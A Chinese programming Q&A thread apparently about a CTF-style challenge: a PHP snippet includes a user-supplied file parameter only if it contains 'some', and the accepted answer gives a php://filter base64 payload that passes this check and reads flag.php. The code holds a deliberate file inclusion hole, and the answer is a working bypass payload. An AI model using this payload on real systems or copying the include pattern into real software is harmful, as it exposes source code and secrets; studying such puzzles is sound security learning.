iringzh 2022-09-29 09:29 采纳率: 100%
浏览 26
已结题

PHP中文件包含漏洞的利用

PHP中文件包含漏洞的利用
if(preg_match("/some/i",$_GET['file']) && isset($_GET['file'])){
        //flag in `flag.php`
        include($_GET['file']);
    }else{
        echo "Try again?";
    }

没有开allow_url_include,所以无法用data协议来解这个问题。因为需要参数file的值包含字符串some,目前不知道如何用php://filter来读文件,想请问有无好的Bypass的方法?

  • 写回答

2条回答 默认 最新

  • monmomono 2022-10-04 00:05
    关注

    php://filter/read=convert.base64-encode/some/resource=flag.php

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(1条)

报告相同问题?

问题事件

  • 系统已结题 10月15日
  • 已采纳回答 10月7日
  • 创建了问题 9月29日